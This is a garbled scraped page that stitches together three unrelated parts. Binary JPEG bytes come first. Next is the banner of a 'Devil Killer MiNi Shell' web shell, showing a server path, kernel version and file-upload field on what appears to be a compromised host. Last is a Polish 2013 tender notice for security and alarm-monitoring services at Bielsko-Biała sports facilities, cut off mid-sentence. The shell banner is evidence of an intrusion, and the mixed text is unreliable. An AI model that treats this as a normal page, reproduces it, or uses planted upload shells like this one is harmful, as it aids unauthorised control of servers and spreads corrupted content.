JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/208845-N-2013.html

<p class="kh_header"><b>Bielsko-Biała: Usługa w zakresie ochrony fizycznej osób i mienia, monitoringu, obsługi systemu sygnalizacji napadu i włamania oraz napadu w obiektach administrowanych przez Bielsko - Bialski Ośrodek Sportu i Rekreacji
(Znak sprawy: ZP 340-4/13)</b><br>
<b>Numer ogłoszenia: 208845 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bielsko-Bialski Ośrodek Sportu i Rekreacji , ul. M. Konopnickiej 5, 43-300 Bielsko-Biała, woj. śląskie, tel. 33 8221875, faks 33 8221875.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bbosir.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie ochrony fizycznej osób i mienia, monitoringu, obsługi systemu sygnalizacji napadu i włamania oraz napadu w obiektach administrowanych przez Bielsko - Bialski Ośrodek Sportu i Rekreacji
(Znak sprawy: ZP 340-4/13).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
1. Nazwa przedmiotu zamówienia - Usługa w zakresie ochrony fizycznej osób i mienia, monitoringu, obsługi systemu sygnalizacji napadu i włamania oraz napadu w obiektach administrowanych przez Bielsko - Bialski Ośrodek Sportu i Rekreacji.
2. Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usług polegających na bezpośredniej ochronie stałej i doraźnej w zakresie ochrony osób, fizycznej ochrony obiektów i mienia, monitoringu obiektów oraz obsługi, konserwacji i naprawy systemów sygnalizacji włamania i napadów oraz napadów polegającym na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych w obiektach administrowanych przez Bielsko-Bialski Ośrodek Sportu i Rekreacji, zgodnie z wymaganiami określonymi w Specyfikacji Istotnych Warunków Zamówienia wraz z załącznikami.
3. Miejsce, terminy oraz szczegółowe opis wymagań dotyczących sposobu realizacji przedmiotu zamówienia zawarte są w załączniku nr 6 do SIWZ.
4. Inne uwarunkowania
a)	Osoby wykonujące umówione usługi z ramienia Wykonawcy, będą je wykonywać zgodnie z obowiązującymi przepisami BHP i p.poż.
b)	Wykonawca zobowiązany jest do współdziałania z Zamawiającym, Policją Strażą Miejską oraz innymi wskazanymi przez Zamawiającego podmiotami  w zakresie działań profilaktycznych celem wzmocnienia stanu bezpieczeństwa obiektów w razie zakłócenia porządku i bezpieczeństwa czy zabezpieczenia obiektu przed zniszczeniem, dewastacją, kradzieżą. Dodatkowo Wykonawca podejmować będzie wszelkie dostępne prawem działania zmierzające do poprawy bezpieczeństwa osób przebywających na terenach chronionych przez Wykonawcę. Wykonywanie obchodów chronionych obiektów w celu badania ich zabezpieczenia oraz informowanie Zamawiającego o stwierdzonych nieprawidłowościach w zakresie zabezpieczenia przed kradzieżą, zniszczeniem lub utratą mienia. 
c)	Wykonawca wyposaży osobę sprawującą dozór na obiektach Zamawiającego w identyfikatory a także w latarkę,  środki łączności bezprzewodowej przywołujące grupę interwencyjną oraz urządzenie zapewniające łączność pomiędzy osobami realizującymi czynności ochrony 
a Zamawiającym. 
d)	Zamawiający zobowiąże się informować pracowników Wykonawcy o sytuacjach zwiększających ryzyko powstania szkody w mieniu podlegającym ochronie.
e)	Zamawiający zapewni pracownikom świadczącym usługę ochrony dostęp do pomieszczenia socjalnego w miejscu wykonywania zamówienia.
f)	Wykonawca zobowiązany jest do prowadzenia książki dyżurów na poszczególnych obiektach podlegających fizycznej ochronie, do której personel Wykonawcy oraz osoby upoważnione przez Zamawiającego, będą wpisywały wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony. Zamawiający ma prawo wglądu do w/w książki w każdym dogodnym dla siebie momencie. W terminie do piątego dnia następującego miesiąca po miesiącu świadczenia usług, Wykonawca będzie składał Kierownikom Działów poszczególnych chronionych obiektów, miesięczną książkę dyżurów dla usług wykonanych w poprzednim miesiącu. Personel  Wykonawcy a także osoby upoważnione przez Zamawiającego mają obowiązek bieżącego dokonywania wpisów w książce dyżurów, a Wykonawca także do utrzymywania czystości w pomieszczeniach socjalnych przekazanych przez Zamawiającego. Personel  Wykonawcy a także osoby upoważnione przez Zamawiającego mają obowiązek każdorazowego dokonywania miedzy sobą przekazania obiektu, potwierdzając wzajemne przekazanie w książce dyżurów.  
g)	W każdym czasie Zamawiający ma prawo żądania od Wykonawcy zmiany pracowników ochrony w przypadku stwierdzenia zaniedbywania obowiązków lub nienależytego ich wykonywania.
h)	Wykonawca oświadcza, że usługi będące przedmiotem niniejszej umowy będzie świadczył zgodnie z przepisami prawa polskiego, z dochowaniem należytej staranności i dbałości o interesy Zamawiającego oraz że posiada wszystkie niezbędne zezwolenia przewidziane prawem do realizacji umowy.
i)	Wykonawca jest zobowiązany przez cały okres trwania usługi do posiadania aktualnych koncesji oraz , że pracownicy wykonujący usługi ochrony z ramienia Wykonawcy na Kompleksie Sportowym Orlik oraz Krytej Pływalni Troclik będą posiadać wymagane uprawnienia.
j)	Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego za wszelkie szkody wyrządzone Zamawiającemu lub/i osobom trzecim przez swoich pracowników oraz osoby trzecie w przypadku nie dołożenia przez pracowników Wykonawcy należytej staranności przy wykonywaniu umowy. Odpowiedzialność ta obejmuje w szczególności przywrócenie stanu pierwotnego, pokrycia kosztów napraw (np. obiektów, urządzeń), odszkodowań i kosztów ich dochodzenia itp.
k)	Wykonawca będzie świadczyć usługi w oparciu o osoby: 
- nie karane, posiadające odpowiednie kwalifikacje zawodowe, o ile są wymagane,
- jednolicie umundurowane,
- wyposażone w imienne identyfikatory
l)	Wykonawca zobowiązany jest do koordynowania prac realizowanych przez podwykonawców.
m)	Wykonawca zobowiązany jest do podłączenia urządzeń do transmisji sygnału systemów alarmowych: systemu włamania i napadu oraz napadu w taki sposób aby rozpocząć świadczenie usługi najpóźniej w dniu 01.01.2014r. o godz. 0:01. 
n)	Wykonawca zobowiązany jest do stałego monitoringu sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych. 
o)	Wykonawca zobowiązany jest do kontroli stanu trzeźwości osób pełniących usługi ochrony na polecenie Zamawiającego;
p)	Osoby świadczące usługi ochrony z ramienia Wykonawcy na Krytej Pływalni Troclik oraz w Kompleksie Sportowym Orlik bezwzględnie przed przystąpieniem do świadczenia usługi muszą zostać przeszkolone przez pracowników Zamawiającego potwierdzając przeszkolenie własnoręcznym podpisem.   
q)	Na chronionych obiektach Wykonawca zobowiązany jest do prawidłowego reagowania na mogące wystąpić sytuacje awaryjne związane z instalacjami przeciwpożarowymi, antywłamaniowymi, elektrycznymi, centralnego ogrzewania, wodno-kanalizacyjnymi.
r)	Wykonawca zobowiązuje się do świadczenia usług ochrony dbając o dobre imię oraz wizerunek firmy BBOSiR. 
s)	Zaleca się, aby Wykonawcy dokonali wizji lokalnej w obiektach administrowanych przez Bielsko-Bialski Ośrodek Sportu i Rekreacji  (wymienionych w załączniku nr 6 do SIWZ).
Zamawiający wymaga, aby Wykonawca przystąpił do wykonania Zamówienia w terminach:
1)	Pływalnia Panorama ul. M. Konopnickiej 5 w Bielsku-Białej
- od 26.05.2014r. do 05.09.2014r. - ochrona fizyczna,
- od 31.05.2014r. do 31.08.2014r. - obsługa monitoringu wizyjnego, ochrona dzienne,
- od 01.01.2014r. do 31.12.2014r. - monitorowanie systemu sygnalizacji włamania i napadu,   
- od 31.05.2014r. do 31.08.2014r. - monitoring system napadu w kasach
2)	Pływalnia Start ul. Startowa w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna,
- od 24.05.2014r. do 14.09.2014r - obsługa monitoringu wizyjnego ochrona dzienne,
- od 24 maja 2014r. do 23.09.2014r. - monitorowanie systemu sygnalizacji napadu w kasach,
3)	Kryta Pływalnia Troclik ul. Sosnkowskiego 14 w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna, monitorowanie systemu sygnalizacji napadu,
4)	Hala wielofunkcyjna ul. Karbowa 26, w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna,
5)	Ośrodek Sportowo-Rekreacyjny Victoria ul. Bratków 16, w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - monitorowanie systemu sygnalizacji napadu,
6)	Stadion Miejski ul. Rychlińskiego 21 w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r.. - ochrona fizyczna,
7)	Kompleks Sportowy Orlik ul. Słowackiego 27B w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna,
- od 01.01.2014r. do 31.03.2014r. oraz od 01.11.2014r. do 31.12.2014r. - monitorowanie systemu sygnalizacji napadu,
8)	Tereny Rekreacyjne Błonia ul. Pocztowa 43 w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna,
9)	Stadion Piłkarski ul. Młyńska 52b w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna,
10)	Stadion Lekkoatletyczny Sprint ul. Jaworzańska 120 w Bielsku-Białej
- od 01.01.2014r. do 31.12.2014r. - ochrona fizyczna,
- od 01.01.2014r. do 31.12.2014r. - monitorowanie systemu sygnalizacji włamania i napadu,   
2.	Zamawiający zastrzega sobie prawo zmiany ilości dni i godzin ochrony oraz termin rozpoczęcia i zakończenia świadczenia usług np. w przypadkach związanych ze zmianami w okresie funkcjonowania obiektów.  Wykonawca zobowiązuje się do nieobciążania BBOSiR w miesięcznym rozliczeniu należnością za dni i godziny nie wykonywania usługi ochrony.
3.	Terminy określone w rozdziale IV pkt. 1 SIWZ oraz w załączniku nr 6 do SIWZ mogą ulec przesunięciu w przypadku wystąpienia:
a)	przestojów i opóźnień zawinionych przez Zamawiającego,
b)	działania siły wyższej, mającej bezpośredni wpływ na terminowość świadczenia usługi,
c)	wystąpienia okoliczności, których strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy. W okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usług zamówień uzupełniających, których wartość nie przekroczy 5% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 50.80.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Posiada aktualną koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. 2005, Nr 145, poz. 1221 ze zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej, zabezpieczenia technicznego.
Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Posiada wiedzę i doświadczenie przedstawiając wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych, głównych usług, w okresie ostatnich trzech (3) lat przed upływem terminu skłania ofert - należy wykazać się minimum dwiema usługami odpowiadającymi swoim rodzajem usłudze stanowiącej przedmiot zamówienia (tj. ochrony osób, fizycznej ochrony obiektów i mienia albo ochrony osób, fizycznej ochrony obiektów i mienia z monitoringiem systemu sygnałów włamania i napadu lub napadu), każda z usługi o wartości nie mniejszej niż 250.000,00 zł brutto (słownie: dwieście pięćdziesiąt tysięcy złotych brutto) 
Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Posiada grupę interwencyjną (patrol samochodowy - minimum 3) na terenie Bielska-Białej zdolną podjąć bezpośrednią interwencję na obiekcie w czasie 15 minut w godzinach od 7:00 do 20:00 oraz w czasie 10 minut w godzinach od 20:00 do 7:00 od momentu powiadomienia o zagrożeniu oraz posiada stację (bazę) monitorowania.
2) Pracownicy ochrony fizycznej wyposażeni zostaną w środki łączności bezprzewodowej przywołujące grupę interwencyjną (patrol samochodowy) w sytuacji zagrożenia oraz telefony komórkowe.
Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Dysponuje osobami z uprawnieniami do pracy na urządzeniach elektrycznych pod napięciem do 1 kV (dotyczy Pływalni Troclik) oraz urządzeniach chłodniczych o mocy powyżej 50kW (dotyczy Kompleksu Sportowego Orlik).
2) Dysponuje pracownikami realizującymi bezpośrednią ochronę fizyczną.
Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.5 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie niższą niż  300 000,00 zł. 

Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu 
oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1  Oryginał oferty sporządzonej na Formularzu Ofertowym - stanowiącym Załącznik nr 1 do SIWZ.
2  Oświadczenie wykonawcy (złożone na formularzu Oferta załącznik nr 1 do SIWZ), że:
1)	W cenie oferty zostały uwzględnione wszystkie koszty niezbędne do całkowitego i efektywnego  wykonania przedmiotu zamówienia i że cena oferty jest ceną ostateczną.
2)	Zamawiający nie będzie ponosił żadnych innych dodatkowych opłat z tytułu realizacji przedmiotu zamówienia.
3)	Zdobyłem/liśmy wszelkie informacje konieczne do sporządzenia oferty.
4)	Zapoznałem/liśmy się z warunkami przetargu zawartymi w specyfikacji istotnych warunków zamówienia wraz z załącznikami i przyjmuje/my te warunki bez zastrzeżeń.
5)	Pozostaje/my  związany/i złożoną przez nas ofertą przez okres 30 dni - bieg terminu rozpoczyna się wraz z upływem terminu składania ofert.
6)	Zobowiązuje/my się wykonać zamówienie w terminach zgodnych ze SIWZ.
7)	Akceptuje/my bez zastrzeżeń warunki zawarte w załączniku nr 10 (istotne postanowienia umowy) 
i zobowiązujemy się w przypadku wybrania naszej oferty do zawarcia umowy na wymienionych warunkach  określonych w istotnym postanowieniu umowy; 
8)	Niniejsze zamówienie zamierzam/y wykonać*
a)	  siłami własnymi
b)	siłami własnymi i przy pomocy podwykonawców w następującym zakresie: ... (należy wskazać zakres)
3  Oryginał oferty cenowej sporządzonej na Formularzu cenowym - stanowiący załącznik nr 2 do SIWZ.
4 Pełnomocnictwo do podpisania ofert względnie do podpisania innych dokumentów składanych  wraz z ofertą, bądź też do podpisywania umów w imieniu Wykonawcy, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. Wykonawcy wspólnie ubiegać się 
o udzielenie przedmiotowego zamówienie (konsorcja, spółki cywilne itp.) winni ustanowić pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - art. 23 ustawy. Pełnomocnik konsorcjum, spółki cywilnej itp. winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie
       Z pełnomocnictwa powinien wynikać zakres udzielonego pełnomocnictwa.
5. Oświadczenie wykonawcy w trybie art. 44 ustawy Prawo zamówień publicznych o spełnieniu warunków, o których mowa w art. 22 ust. 1 tej ustawy - wg wzoru stanowiącego załącznik nr 3 do SIWZ.
6. Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w celu udowodnienia, iż wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia - w przypadku, gdy wykonawca wskaże, że będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b. ustawy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający istotne postanowienia Umowy zawarł  w załącznik nr 10 do SIWZ. 
2.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy co do nieistotnych postanowień umowy oraz co do istotnych postanowień umowy, z ważnych powodów, 
a w szczególności o ile jest ona konieczna i wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. W szczególności:
